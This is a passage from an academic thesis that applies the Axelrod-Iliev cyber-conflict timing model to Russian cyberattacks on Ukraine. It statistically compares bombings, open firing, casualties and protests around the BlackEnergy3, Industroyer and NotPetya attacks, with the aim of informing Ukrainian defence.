indicator of the stakes surrounding the use of a cyber resource. When stakes are 푇 = 1, they are low, meaning a resource is likely to survive longer, no matter how many times it is used. If stakes are 푇 = 6, the stakes of using the cyber resource are high, meaning the use of a resource is likely to cause alarm, therefore sacrificing any future usability. To determine the stakes of the cyber resource, this paper will use the simplest case where “the distribution of stakes is linear, meaning that in each year there is the same probability that the stakes will be 1,2,3,4,5, or 6.”240 Due to historical Russian use of informational warfare and cyberattacks, it is assumed that the Russian government will use a cyberattack while any stakes are present.
Calculating Discount Rate (w)
“A reflection of the fact that a given payout is less a year from now than it is today”.241 In
Axelrod and Iliev’s paper they use 푤 = 0.9, as this value is the standard discount rate. This is the same value that will be used in the calculations regarding the timing of attack in the Ukrainian
Crisis. Due to the changing nature of conflict, it is understood that 푤 = 0.9 is not necessarily the most consistently accurate discount rate value.
Applying the Equation to Ukraine Data
Pr(s≥T) = probability that the current stakes are greater than or equal to the Threshold at any time. This value is the probability that the resource will be used at a given time. The probability 푃푟(푠 ≥ 푇) means that stakes will be based on each Threshold (푇) where:
푇 = 1 푇 = 2 푇 = 3 푇 = 4 푇 = 5 푇 = 6
푃푟(1 ≥ 1) 푃푟(1 ≥ 2) 푃푟(1 ≥ 3) 푃푟(1 ≥ 4) 푃푟(1 ≥ 5) 푃푟(1 ≥ 6)
240 Axelrod and Iliev. “Timing of Cyber Conflict.” 1300. 241 Ibid. 1299 92
푃푟(2 ≥ 1) 푃푟(2 ≥ 2) 푃푟(2 ≥ 3) 푃푟(2 ≥ 4) 푃푟(2 ≥ 5) 푃푟(2 ≥ 6)
푃푟(3 ≥ 1) 푃푟(3 ≥ 2) 푃푟(3 ≥ 3) 푃푟(3 ≥ 4) 푃푟(3 ≥ 5) 푃푟(3 ≥ 6)
푃푟(4 ≥ 1) 푃푟(4 ≥ 2) 푃푟(4 ≥ 3) 푃푟(4 ≥ 4) 푃푟(4 ≥ 5) 푃푟(4 ≥ 6)
푃푟(5 ≥ 1) 푃푟(5 ≥ 2) 푃푟(5 ≥ 3) 푃푟(5 ≥ 4) 푃푟(5 ≥ 5) 푃푟(5 ≥ 6)
푃푟(6 ≥ 1) 푃푟(6 ≥ 2) 푃푟(6 ≥ 3) 푃푟(6 ≥ 4) 푃푟(6 ≥ 5) 푃푟(6 ≥ 6)
ퟔ ퟓ ퟒ ퟑ ퟐ ퟏ = 1 = 0.833 = 0.667 = 0.5 = 0.333 = 0.167 ퟔ ퟔ ퟔ ퟔ ퟔ ퟔ
1- Pr(s≥T) is the inverse of the probability that the current stakes are greater than or equal to the Threshold at any time. This is calculated as the additive inverse of the probability above.
G(T) = average short-term gain – average short-term gain can be defined in terms of the threshold as the stakes at which the decision to attack are averaged.242 The Threshold selected for the Ukrainian Crisis is based on the relationship between Russia and Ukraine, where, due to political aspirations and socio-economic rivalries, as well as historic information warfare from the
Russian government, a resource can be used while the stakes are at any level. Thus, calculations will be done to show the expected value of an attack at multiple threshold levels. The average short-term gain, 퐺(푇), would be calculated as follows, based on the Threshold:
1 + 2 + 3 + 4 + 5 + 6 퐺(1) = = 3.5 6
2 + 3 + 4 + 5 + 6 퐺(2) = = 4 5
3 + 4 + 5 + 6 퐺(3) = = 4.5 4
242 Axelrod and Iliev. “Timing of Cyber Conflict.” 1299. 93
4 + 5 + 6 퐺(4) = = 5 3
5 + 6 퐺(5) = = 5.5 2
6 퐺(6) = = 6 1
5.3 Solving for Optimal Timing
All calculated values follow:
푃푟(푠 ≥ 푇) and 퐺(푇) are based on which Threshold (푇) value is being calculated.
푤 = 0.9
Persistence (푃) = 0.5557
Stealth (S=P/2)= 0.27785
The following equation solves for 푃 = 0.5557 (55.57% chance of resource survival) and
푇 = 1 (the resource should be used right away and as often as possible) where stakes are 푃푟 (1 ≥
1):
푉 = (1)3.5/[(1 − (0.9)(0.557)) + (1)0.9(0.5557 − 0.27785)]
94
Table 3: Optimal timing of a Cyber Attack Based on Ukrainian Attacks
1 4.6671 2 4.7051 3 4.5028 4 4.0006
Threshold 5 3.1434 6 1.85
Based on Table 3, the optimal threshold is 푇 = 2, meaning that a cyberattack is most beneficial for Russia to partake in when the stakes are relatively low, such as during a lull in fighting or a major international problem that averts the focus from the Ukrainian Crisis. If the
Russian government exploits a vulnerability in the Ukrainian system while stakes are low, it is more likely to last longer in the system, and can be used multiple times, if programmed to do so, to attack the system. If a vulnerability is exploited during a time of high stakes there is a greater likelihood that it will be found more quickly and will not be able to perform the attack.
Since Ukraine has a shortage of cyber security expertise, cyber resources can remain in the system for a long time before they are discovered. Thus, resources should be placed and then lie in wait for the optimal deployment time. This means that the Russians should place new cyber resources in the system that can be exploited during times of lowered hostilities. Attackers should refrain from using the cyber resource when the Ukrainian government is on guard because of a recent uptick in hostilities or a recently discovered attempt at cyber espionage. Waiting to exploit a vulnerability is most beneficial when governmental focus has been directed away from cyber capabilities in favor of something else. As Russia has a distinct advantage over Ukraine in terms of military infrastructure and capability, the chances that an exploit exists for a longer period of time than the international average is high. Attacks that are made to routinely exploit 95
vulnerabilities should be used covertly and often when there are stakes to consider but not such high stakes that defense is the forefront of the government’s agenda. Attacking with lower stakes means the information gained or vulnerability exploited will lack continuity and value, while using a resource during higher stakes means that the resource is unlikely to survive long enough to carry out an attack that has serious ramifications.
5.4 Conclusion
This chapter operationalizes the mathematical equation for predicting cyberattacks, presented by Axelrod and Iliev in their 2014 paper “Timing of Cyber Conflict.” Cyber conflict is a concern many states are taking seriously, especially as large powers move to dominate the cyber sphere and use it to their advantage. Russia has emerged as one of the primary players in using cyber as an offensive weapon, and its use of cyberattacks against Ukraine were the basis for the operationalization of the equation. This paper intended to calculate the conditions that would be optimal for the next Russian cyberattack on Ukraine, and then use that information to make an informed defensive strategy for Ukraine. However, the discrepancies in cyber capabilities between
Russia and Ukraine means it is most important for Ukraine to continue to bolster their cyber defensive and offensive capabilities. This should be done while simultaneously being aware that there are large vulnerabilities in their current system that are being exploited by Russia.
The Axelrod-Iliev equation calculate a T=2 value, meaning the attacks against Ukraine that will be most efficient are those which take place during a lull in risk of using the cyber resource.
This means that there will be a diversion of focus away from the Ukrainian Crisis or the Ukrainian government will feel less vulnerable for any number of reasons. These reasons could range from an increase in Ukrainian confidence by installing new defensive software or transitioning away 96
from Soviet built infrastructure, to a downturn in fighting or possibly a fruitful ceasefire negotiation.
Ukraine’s cyber defense system should be bolstered against attack through the use of continually upgrading cyber capabilities and training more developers to monitor systems and ensure more widespread security. Penetration teams should conduct extensive testing to try to penetrate the most vital Ukrainian systems. Most importantly, a feeling of confidence in cyber security should never be normalized. When the risks of using a cyber resource are lowered the chance a cyber resource can wreak more havoc and remain longer in the system becomes greater.
Assumptions that a downturn in fighting or a ceasefire are likely to cause a downturn in the use of cyber attacks is incorrect, as the equation, operationalized using Ukrainian Crisis data, predicts that there is likely to be a cyberattack during a calmer physical attack period. Thus, cyber teams should remain aware of the physical attributes of the Conflict and be prepared to patch vulnerabilities, defend the systems and clean up after an attack when the attacks get quiet.
Further research in this area should include expanding the sample size of cyberattacks in
Ukraine and should consider the changing nature of Ukraine’s cyber security field. This equation would be better suited to determine the optimal timing for a specific resource within the Ukrainian
Crisis, rather than trying to predict the next cyberattack that has unknown parameters. One avenue for future research would be to couple it with an extensive game-theory design that would more accurately account for the changing nature of the Ukrainian Crisis and the political backdrop on which these cyberattacks are taking place.
97
6 STATISTICAL ANALYSIS
While quantitative analysis is often not used in strategic studies research and cyberwarfare in favor of the theory surrounding international relations and war, new technologies in warfare must be viewed through a more precise lens. Theories surrounding the use of hybrid warfare are plentiful, but they all aim to describe rather than explain or reach a conclusive decision on what steps should be taken to alleviate international pressures of the cyber sphere. The lack of definitions within this area of study, as discussed in Chapter 2, and the desire to control cyber capabilities, as discussed in Chapter 3, further hamper understanding that would facilitate cyber cooperation within the international community. Since it is difficult to agree on how to approach cyber, especially in terms of war or cooperation, it is important to back theories with data.
Building on the idea that cyberattacks are most likely to take place in the Ukrainian Crisis when the risk is lowered, this chapter focuses on how to look at physical attributes of the war to understand the imminence of a cyberattack. This data can then be used to prove or disprove the findings in the previous chapter as well as highlight other correlations that may not have been presented in the previous data. Based on the theoretical finding that a threshold where 푇 = 2 is optimal, it follows that there will most likely be a downturn in fighting leading towards the date of a cyberattack, with a high likelihood that fighting will again climb following the cyberattack. If a ceasefire was in negotiation, as it was during NotPetya, the fighting will continue to diminish following the cyberattack. From the stakes calculated for the Ukrainian Crisis, the statistical data is analyzed to discern if the calculation makes logical sense, analyze when the attacks take place around cyberattacks, and provide a better understanding of when cyberattacks are likely to be employed against Ukraine.
98
As this analysis aims to assess the conflict using empirical data, following a strict methodology of data collection and data analysis is vital. To ensure the most accurate data collection the following methodology is used.
The site liveuamap.com was used for data collection for all data points.243 While the data collected by the Organization for Security and Cooperation in Europe (OSCE) may present more accurate data than that collected by liveuamap.com, the latter was chosen for several reasons. First, the OSCE data does not distinguish between Ukrainian attacks and Russian/LNR/DNR attacks.
Since this project specifically looks at the relationship between the attacks carried out by the
Russian/LNR/DNR groups and their attacks on Ukrainian infrastructure, the OSCE data was less useful. The second reason the liveuamap.com data was chosen is we wanted to include many different types of data, especially the addition of volunteer data that is missing from other data sets. The third reason is that liveuamap.com compiles data from many sources, including social media, which often has better insight into what is happening on the ground because many of the volunteers or soldiers post information then captured by liveuamap.com. The final reason this website is deemed the best point of data collection is because the US Embassy in Kyiv used it as a tool for monitoring the situation in Donbas. Thus, we are confident that using liveuamap.com as the main point of data collection is appropriate.
Five categories of data were collected for three cyberattacks: BE3/KillDisk (Appendix A,
Table 1), CrashOverride/Industroyer (Appendix A, Table 2) and NotPetya (Appendix A, Table
3). These three cyberattacks were chosen, while Operation Armagedon and X-Agent were disregarded, due to the nature of the three attacks. Each BE3/KillDisk, CrashOverride/Industroyer
243 Ukraine Interactive Map. Live Universal Awareness Map. Last modified April 30, 2019. https://liveuamap.com
99
and NotPetya had a discernable attack date, whereas Operation Armagedon and X-Agent were made to remain in the systems for a long period of time.
The five categories of data used were: Bombings, Open Firing, Military Personnel and
Policemen Killed or Wounded, Civilians and Politicians Killed or Wounded and Protests. These categories are chosen due to the differences between each category, and to capture the most data points possible. Each category had specific parameters for the data points collected that will be expounded upon in their respective sections. If data did not fall within these categories, the data was not included. All five categories are collected day by day for each attack. Data was collected
90 days prior and post each cyberattack. This was chosen to ensure ample time to discern if there was a trend spanning a long period of time, before or after, the attack.
We begin the analysis of the attack data by collecting the day by day events. Data was then split into several different tables to analyze the data points concisely. First, each category within each attack was plotted. This allows us to identify trends across the categories of the same attack.
Second, the data from individual days were plotted based on each category, with the three different cyberattacks overlaid. This allows us to identify trend across the three cyberattacks within the same category. Then a 5th degree polynomial trendline was added to view trends across all three attacks within each of the five physical attribute categories. Third, the day by day charts were duplicated and overlaid with a two-day moving average. This showed outliers as well as smoothed out the data to show more discernable trends. Fourth, each day by day event was compiled by Week to show a more compact chart and view weekly trends. This removed fluctuations based on one-off events. These charts were plotted similarly to the day by day charts, each chart was a specific category, with the three cyberattacks overlaid. Fifth, failed cyberattacks were plotted on the weekly 100
trend charts to determine if there were any discernable trends of physical attributes during the time of thwarted cyberattacks.
The first model used to assess trends within the data is plotting a polynomial trendline, using a 5th degree polynomial. Polynomial functions are used to model changes over time in real world applications (e.g. the stock market) and are therefore chosen as the trendline of best fit.244
The 5th degree polynomial allows more data points to be used when creating the trend line, allowing for a higher confidence in the results.245 While the R values fluctuate in confidence level, the trend lines themselves help view patterns within the data, even if the trendline does not always hold statistically significant.
The second model used to assess trends was a 2-day moving average. The moving average was chosen to see if there was a consistent average gain or loss in relation to the cyberattacks. This analysis, while secondary to the polynomial function, is helpful to even out the trendlines in the case of a random set of data. While a three day, or a four day, moving average would have caused a smoother trendline, the additional manipulation can cause the trendline to appear drastically different than it is in reality, especially when the data does not follow a distinct trend.
Following the analysis of the categories and three major cyberattacks on their own, the weekly data with the polynomial trendline was used to plot failed cyberattacks. While three major cyberattacks are recorded diligently in this project, there have been many other, smaller cyberattacks that are less newsworthy or are lower in overall impact. Adding the failed cyberattacks to the graphs, trends between successful and thwarted cyberattacks can be analyzed.
244 Shifei Ding, Huajuan Huang and Ru Nie, “Forecasting Method of Stock Price Based on Polynomial Smooth Twin Support Vector Regression,” in Intelligent Computing Theories, ed. Huang DS, Bevilacqua V., Figueroa J.C., Premaratne P., Lecture Notes in Computer Science, Vol. 7995 (Springer: Berlin, 2013). 245 Donna M. Young, “A Graphic Organizer for Polynomial Functions,” The Mathematics Teacher 106, No. 2 (Sept. 2012); 160- 162. 101
Understanding both can be helpful in determining the consistency of the connection between specific physical attribute and a cyberattack. Unsuccessful attacks are a further method to discern if the stakes of 푇 = 2, identified in the Axelrod-Iliev equation, remains true. Our primarily quantitative approach is undertaken to better understand the conflict. However, even if the data cannot statistically prove correlation between cyberattacks and physical attacks, it can be layered with qualitative analysis to provide a fulsome picture.
All data tables are included in Appendix A:. All Charts are included in Appendices B-
Appendix F:.
102
6.1 Bombings
The first of the five categories used to analyze the physical warfare attributes of the Ukrainian
Crisis is Bombing (Appendix B), identified with the following classifications: Any reports of
artillery being used, that is above 86
mm, and any shots fired by weapons
classified as anti-aircraft or heavy
weapons, including tanks. This also
encompasses attacks made by ATGMs,
mortars, MLRSs, grenade specific
warfare, GRAD and mine warfare. The
bombings must be either deliberate in
nature and target Ukrainian military or
civilian infrastructure or a direct result
of Russian/LNR/DNR military or
separatist initiatives, such as rigging a
field with anti-personnel landmines.
Bombings that resulted in death or
injury to any persons, military or
civilian, are counted in the total
Bombings as well as in the civilian or
military death tolls. Bombings that
were in parallel to small arms combat
Graphs 1-3. These indicate the day by day Bombings are also counted. For Bombings, as a during the three major cyberattacks 103
general rule, the number represents the number of locations hit, not the number of weapons discharged. A lower number does not always correlate with a lower number of bombs detonated, but rather, a more concentrated area of fighting. Further, if reporting of specific structures or specific target as having been destroyed is available, each target is marked as one instance of
Bombing, even if more than one bomb was used in the attack.
Within the Bombing category, threats and terrorist attacks are also captured. While threats can range from assassination threats to bomb threats and include a wide variety of sins, there is a higher tendency for bomb threats throughout Ukraine than other kinds of threats. In addition, the majority of threats in the data are of indiscriminate nature, which is defined to be more akin to
Bombing than other attack categories. Threats are not included as a separate category due to the potentiality of a threat to be carried out, the overwhelming majority of threats carried out were, in fact, bomb threats. Further, threats have, at a minimum, intent to cause panic or disturbance, resulting in a government response. The final reason threats are not a single category is the limited data available reporting on threats received. The lack of reliable threat data makes it impossible to identify any trends that can be deemed significant. Terrorist attacks are included in this section as they intend to cause mass panic, similar to threats. In addition, the majority of terrorist attacks do not come to fruition, remaining as threats. The small number of terrorist attacks in Ukraine did not warrant “terrorist attacks” having a significant separate category.
To better analyze the relationship between physical bombings and each cyberattack, each attack was split into prior and post attack dates. This provided a clearer picture of events around the attack date. The three attacks were overlaid on the same graph to facilitate easier comparison.
Bombings prior to the BlackEnergy3/KillDisk Attack were relatively low in number in comparison to the levels of the other two attacks. This may be because it occurred earlier in the war, following 104
the failed Minsk II agreement. While not a single provision of Minsk II had been met by the point of the BlackEnergy3/KillDisk attack, Russia was still claiming negligence and playing a political long game, which dampened the overt use of some types of weaponry.
Prior to the attack both CrashOverride/Industroyer and NotPetya have a dip in Bombings, while BlackEnergy3/KillDisk has a slight raise in the trendline because of a large number of
Bombings three days prior to the cyberattack. However, leading up to the day of the attack, the averages were low for BlackEnergy3/KillDisk, which suggests that the trendline is increasing prior to the attack due to an outlier.
Graph 4. Each point is the total bombings for the week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.
105
When the attacks were amalgamated by Week, BlackEnergy3/KillDisk followed a similar trend to the other two, where the amount of attacks is trending down prior to the attack, beginning two to three weeks prior to the attack. While NotPetya occurs at a slightly different time than the other two attacks, this is likely due to the Schoolyear ceasefire agreement, agreed upon on the 26th of August, 60 days following the attack.
BlackEnergy3/KillDisk, CrashOverride/Industroyer and NotPetya all have trendlines that suggest
Bombings are likely to wane leading up to a cyberattack. Both BlackEnergy3/KillDisk and
CrashOverride/Industroyer climb following the attack, although this is not linear, further suggesting that Bombings will again rise following a cyberattack, and any lull in fighting surrounding a cyberattack is unlikely to continue. Leading up to and directly following the
NotPetya attack the School Year Ceasefire was negotiated, and then brought into action on the 60th day following the attack, the middle of Week 22.
Ukraine has suffered many cyberattacks of varying nature, but many were not successful.
It is possible to plot these within the weekly attack graph, which results in all cyberattacks, except one that is not confirmed, to be situated above the Bombing trendline for each failed cyber attempt.
If Russia continues to attack when there are lower physical stakes or a pivot away from focus on the crisis during this time that lowers the physical stakes, this would imply that there are more attacks thwarted when the number of physical attacks is higher. Graph 5 overlays thwarted cyberattacks with this data to view where they fall along the trendline. 106
Graph 5: Cyberattacks and suspected cyberattacks that were thwarted prior to damaging Ukrainian systems.
As physical warfare on the ground increases, the Ukrainian government is more likely to be focusing on impeding attacks than when there is a calm in the fighting, during which international obligations may have higher importance. As shown in Chapter 5, an attack is most likely to be successful when it is carried out at a time of lower stakes – when there are fewer Ukrainian and
Western eyes focused on the cyber aspect of the Crisis. BlackEnergy3/KillDisk,
CrashOverride/Industroyer and NotPetya all occurred as successful attacks during a period when bombings were trending downward. 107
The data collected under the Bombing category shows a pattern between the number of bombings occurring and when a cyberattack takes place. In future research this correlation should be examined more carefully. Further analysis should take place that uses OSCE data gathered to track the heavy artillery exchanges. Analysis on Ukrainian bombing should also be examined to see if there are any identifiable trends concerning the rate of Ukrainian attacks against
Russian/LNR/DNR positions and the use of cyber attacks against Ukrainian infrastructure. Future research should rely on multiple collection sites from different actors in the war including Russian figures, Ukrainian figures, OSCE figures and LNR/DNR figures.
108
6.2 Open Firing
The second category of information
collected is data on open firing instances
(Appendix C:). This category is perhaps
more straightforward than bombing as
any attack that used weapons not
designated as heavy weaponry, nor
mentioned under the data collected in
Bombings, falls under Open Firing.
Open firing must have been from a
Russian/LNR/DNR military or separatist
group against a Ukrainian group. This
distinction is difficult to confirm in some
cases but the use of liveuamap.com
assisted in this distinction because it had
links to social media of sympathizers
with either the Ukrainian cause or the
Russian/LNR/DNR cause. From this, it
was more likely to determine which side
perpetrated which violence. Although
Graphs 6-8: These graphs indicate the day by day reports on social networking sites can Open Firing instances across all 3 attack periods. often be propaganda, caution was taken to monitor both pro-Ukrainian propaganda and pro-separatist propaganda. 109
Open firing also includes any gun related attacks on military police or civilian infrastructure outside of Donbas. Any attacks that target persons or infrastructure with a gun, such as an assassination or murder of a policeman is included in this category. Open firings that results in deaths are included in this category while each individual death is included under the Killed or
Wounded Persons category. Any acts that include an attack with a weapon for the purposes of supporting Russia/LNR/DNR are considered instances of open firing. If there is an attack where the motive cannot be determined the attack is not included.
To better analyze the relationship of open firing to each cyberattack, each attack was split into prior and post attack date. This provides a clearer picture around the attack date. The three attacks were overlaid on the same graph to facilitate easier comparison. Unlike in the Bombing data, the open firing data shows a starkly different picture. Prior to the BlackEnergy3/KillDisk and
CrashOverride/Industroyer attack there was a significant increase in number of attacks, followed by a drastic downturn immediately after the cyberattacks. Figures 7 and 8 show the day by day values, which indicate a clearly discernable spike in open firing leading to the attack, with a downturn in open firing instances directly after the attack. The NotPetya attack happens in a downturn of Open Firing but this downturn can be attributed to the negotiations happening around the School-year ceasefire agreements. Due to the calculation of 푇 = 2 from the Axelrod-Iliev model (see Chapter 5), this downturn would make the occurrence of NotPetya in line with previous theories. 110
Graph 9: Open Firing instances beginning 91 days prior to each cyberattack.
Graph 10: Open Firing instances 90 days following each cyberattack.
111
Evaluating the Open Firing data by Week helps clarify the overall timeline of each attack as well.
Whereas in the daily data the trendline shows a large drop in both BE3/KillDisk data and in
CrashOverride/Industroyer data, this dip is an anomaly in the BE3/KillDisk data within one Week.
The polynomial function does not clearly identify these attacks as a dip in the trendline, unlike the data when analyzed by day. Both granularities show Open Firing spiking around the time of the cyberattack. The exception again is NotPetya, which is influenced by the School-year ceasefire agreement. NotPetya follows the same general trend as in Bombings, where a decrease in instances begins around Week 9.
Graph 11: Open firing by week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.
112
Recall that there are multiple cyberattacks on Ukrainian infrastructure that were thwarted prior to
successful
disruption of
Ukrainian
systems. These
attacks have
been overlaid
with Graph 11 to
determine if the
attacks occurred Graph 12: Cyberattacks and suspected cyberattacks that were thwarted prior to damaging Ukrainian systems. at a time of high stakes, when there would have been more attention on the Ukrainian Crisis and cyberattacks.
Graph 12 is used to further investigate the relationship of cyber and physical attacks in the
Ukrainian Crisis.
By analyzing Graph 12 it is obvious that the majority of thwarted attacks fall below or along the trendlines. This is in direct contrast with the data analyzed in the Bombings section, where all but one suspected attack was above the general trendline. In Open Firing the opposite is true, where all, except one, are below the trendline, with another appearing on the line. Open Firing and cyberattacks appear to have little correlation with one another.
One reason for the different findings within this category is potentially related to the number of bombings decreasing at the time of cyberattack. If the number of bombings reduces at the same time that the number of Open Firing rises, it is possible that the Russian side is unlikely to use as much heavy artillery when they are using more soldiers. This could be indicative of a lower number 113
of Bombings, but a larger number of small arms combats around the time of cyber attacks. More research would have to be undertaken before making a definitive statement about the relationship between these two data.
114
6.3 Military Personnel and Policemen Killed or Wounded
The third category analyzed is the data
of Military Personnel and policemen either
killed or wounded (Appendix D:). This includes
all police forces across Ukraine, Ukrainian
military units fighting in Donbas, volunteer
military troops fighting in Donbas and national
guardsmen. Police are an important inclusion as
often an attack directly against police following
the induction of the new police force, beginning
the summer of 2015, was due to direct
displeasure stemming from Western
involvement of police reform and training. Any
incidents surrounding police had to have a
direct link to anti-Ukrainian, anti-Western,
anti-EU, pro-Russian or pro-separatist
motives. If a shooting involving police
occurred, news articles and other media, Graphs 13-15: These graphs indicate the day by day Military Personnel and Policemen Killed or including YouTube video, video from media Wounded across all 3 attack periods. providers, and eyewitness social media would be used to determine the motivating factor. With the addition of national guardsmen, policemen and volunteer soldiers, the numbers may vary from other sources. Any persons that had been wounded, and then later died due to wounds are only counted as a single instance, recorded on the day of wounding. 115
This set of data had fewer overall numbers than the first two categories and fluctuated significantly between days when there would be no reports and days where mass casualties would be reported. For these reasons, this data is less reliable than the first two categories of data but general assumptions can still be made from this data group. Tracking wounded and killed military personnel and policemen was difficult due to the lack of coherent reporting and large number of volunteer troops used during the BE3/KillDisk timeline. As data reporting from the Crisis becomes more standard, the numbers become more accurate, but many volunteer forces still operate outside of the reporting structure and non-life-threatening wounds may not be fully reported.
First, considering the weekly data, which generally shows trends more clearly and succinctly, it is obvious that an outlier in the CrashOverride/Industroyer data set is causing a large spike in the trendline that does not take into account the outliers of Week 14 and Week 20.
Noticeably the trendlines for both BE3/KillDisk and NotPetya are trending downwards over the time each respective cyberattack took place. Although CrashOverride is the most abnormal trendline among the three, all three cyberattacks occurred after a Week of relative calm in terms of military personnel or policemen deaths and woundings. In the Open Firing data set, Week 14 had 421 incidents compared to the 332 and 274, respectively, for the two following Weeks. While
Week 13 had 425 instances of Open Firing, the day of the attack was the beginning of the increase with 126 occurrences, while the four days prior had 52, 17, 18 and 15, respectively. The number spike in Week 14 includes all attacks post cyberattack. This increase in deaths and wounding is consistent with both the increase in Open Firing instances and the increase in Bombings post cyberattack. 116
The day to day data is shown in Graphs 16 and 17. Obviously there is a large spike in
Deaths or Woundings beginning on the day of the cyberattack and continuing for about a Week following the cyberattack.
Graph 16: Military Personnel and Policemen Killed or Wounded 91 days prior to the cyberattack.
Graph 17: Military Personnel and Policemen Killed or Wounded 9 days post cyberattack. 117
It appears that spikes are not uncommon in the data set. This could be due to aggressive offensives during these times, a clash between police forces and anti-Ukraine groups leading to a spike in the less frequent category of policemen deaths, or that reporting of killed and wounded soldiers from the frontline is inaccurate due to political restraints, communication problems, misinformation, or misinterpretation. Unfortunately, the data set is largely unreliable, and conclusions drawn from it are likely faulty. Further investigation using the Deaths and Woundings data category would need to be focused on its intersection with Bombings and Open Firings as well as with cyberattacks. The data could be used to determine if there is a spike aligning with
Bombings or Open Firings, if the spike in Deaths and Woundings are clustered around a different phenomenon, such as cyberattack, international political disruption, or if they are random.
Graph 18: Military Personnel and Policemen Killed or Wounded by week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.
118
6.4 Civilians and Politicians Killed or Wounded
The fourth category analyzed is the data from Civilians and Politicians Killed or Wounded
(Appendix E:). This includes civilians
living in Donbas, in war zones, along the
front lines or any persons killed due to an
attack that had a direct link to anti-
Ukrainian, anti-Western, anti-EU, pro-
Russian or pro-separatist motives. Donbas
veterans killed following return from
deployment or during retirement were
considered civilians when collecting the
data. Since veterans were no longer in an
active war zone nor did they have active
participation in the war, they were no
longer considered soldiers and were
obviously not killed under the same
circumstances. If a retired military veteran
reentered the War in Donbas by
volunteering for a battalion outside of the
official Ukrainian military, those stats Graphs 19-21: These graphs indicate the day by day would be counted under the Civilians and Politicians Killed or Wounded across all 3 attack periods. aforementioned group, Military Personnel and Policemen killed or wounded because they were directly involved in the war at time of death. 119
Politicians were included with civilians as, despite the pointed nature of an assassination of politicians and how drastically different it is than the often accidental murder of civilians in a war zone, they are considered civilians in the majority of countries. Politicians that were attacked by unknown assailants were assessed as attacked due to the divisions created by the war if the politician was pro-Ukrainian independence, pro-western, anti-Russia or anti-separatist. If an attack on a generally pro-Russian politician occurred by unknown assailant’s, further research was conducted to determine if any important vote had occurred prior to the attack and an assessment undertaken of their position on the topic. If no such data could be found, or if the data suggested the politician was continuously pro-Russian, pro-separatist, anti-Ukrainian Independence or anti-
Western, the attack was assessed as a pro-Ukrainian independence attack and therefore not counted. If information found suggested a recent pivot away from historical tendencies, then the attack was assessed as a pro-Russian group and was therefore counted in the data.
This data set is smaller than the previous categories in terms of average number per day.
While assassinations of politicians are news worthy and heavily reported, including attacker motive, there is a lack of coherent reporting on deaths within the combat zone in eastern Ukraine.
Civilian deaths, while captured by OSCE data, are still sporadic and are likely to be reported on the wrong day or missed all together. The data collected from liveuamap.com included the OSCE data and volunteer data but gives few indications that the deaths or injuries are reported on the correct day. Further, any attempts against politicians may be covered up for political reasons, leading to wounding of a politician as an unlikely category to be captured through open source data. 120
Graph 22 shows the number of civilians and politicians killed by Week. The number of deaths is trending down for all three attacks, although the data is insufficient to make legitimate claims about the relationship of civilians and politicians killed or wounded to cyber attacks.
Graph 22: Civilians and Politicians Killed or Wounded by week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.
The number of Civilians and Politicians Killed or Wounded is low around the attack date, both before and after the attack, despite a higher number of open firing instances and a lower number of bombings. This is also the inverse of what was observed in the data set of Military Personnel and Policemen Killed or Wounded, where the number of instances spiked starting the day of the cyberattack and lasted into the immediate future. All three cyberattacks occurred during a downturn in instances. This would likely indicate that the crisis is in a downturn, which is known to be false in terms of open firing, but true in terms of Bombings. The downturn in civilian and 121
politician deaths and wounding can be traced to a number of factors, all with unknown correlations, causations and relevance.
The downturn in deaths and wounding again could be attributed to the downturn in bombings, which is more indiscriminate in nature than Open Firing, especially in towns along the border. This data set is also unreliable, so conclusions drawn from this data set are likely to be faulty. Further investigation focused on the intersection of Bombings, Open Firings and Deaths or
Wounding to attack ratio would be interesting. By then using that data to determine if there is a spike in deaths aligning with physical attacks, or if the ratio suggests that the deaths are clustered around a different phenomenon such as cyberattack, international political disruption.
122
6.5 Protests
The final category of data collected was concerned with the number of protests (Appendix
F:) throughout Ukraine and Donbas.
This data set includes only protests
that fell into the following categories:
anti-EU, anti-Western, anti-Ukrainian
or anti-Ukrainian Independence, anti-
Poroshenko, anti-United States, anti-
foreign aid, pro-DNR, pro-LNR, pro-
Russian, pro-Communist or a protest
celebrating Soviet holidays or dates
that had been discontinued in Ukraine
after the fall of the Soviet Union.
Some protests that were created and
promoted by anti-Russian and anti-
western ultra-right-wing groups fell
within the categories. Thus, some
right-wing protests against the
government were counted that were Graphs 19-21: These graphs indicate the day by day Protests across all 3 attack periods. not strictly Russian/LNR/DNR groups. The decision to add these was made due to their disruption to the government, the police resources needed to stop them from resorting to violence and their violent forms of protest which continued to assist in Ukrainian destabilization. 123
Protests were included as a way to determine if they spiked or waned near a cyberattack.
Due to the large number of protests known to have occurred during the summer of 2015, protests were added as the final category, but the data points are so infrequent that tracking them has near zero confidence.246 This category is most likely to be flawed due to lack of information.
Liveuamap.com, while a social media repository, is likely to miss protests, especially those that are planned off-line, in secret, are impromptu, do not garner violence nor have an overt publicly announced political agenda.
Graph 22: Protests by week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.
246 Protests during the Summer of 2015 were not included in this project as they were outside of the scope. The number of protests over the summer of 2015 is based on data amalgamated by the United States State Department and from the authors work in Ukraine during the summer of 2015. 124
Graph 22 shows the protests by Week. Despite the decline in instances of protests around the cyberattacks, linking Protests and the occurrence of cyber attacks would be a mathematical and logical fallacy. Many protests in Ukraine have happened over the years of the Ukrainian Crisis, the majority of which can be traced to specific events happening in politics or within the Combat
Zone. For instance, under the BE3/KillDisk data, the five protests in Week 7 are due to elections, the two protests under Week 11 are in direct retaliation to the anniversary of the Maidan
Revolution, and several of the others are due to Russian and/or Soviet Holidays. Under
CrashOverride/Industroyer the four protests under Week 23 are due to messages being sent to
Ukrainian citizens and servicemen to defect and join Russia and a loss in confidence in the
Poroshenko government. Under NotPetya, the ten protests in Week 7 were all on May 9th, the
Soviet/Russian holiday named Victory Day, in remembrance of winning the Great Patriotic War
(World War II). The seven protests in Week 24 were all calling for former Georgian President, and former Mayor of Odesa, to have his Ukrainian citizenship reinstated and protests at the border that eventually led to him being drug across the checkpoint by a mob.
125
7 Conclusion
This thesis aims to understand the interplay of cyber and traditional warfare tactics employed in the use of hybrid warfare by asking the following question: What relationship exists between cyber attributes and physical attributes in hybrid warfare and can the interplay of cyber and physical attributes assist disadvantaged states in predicting cyberattacks? Based on the research in this thesis, cyber and physical attributes show a pattern between the number of
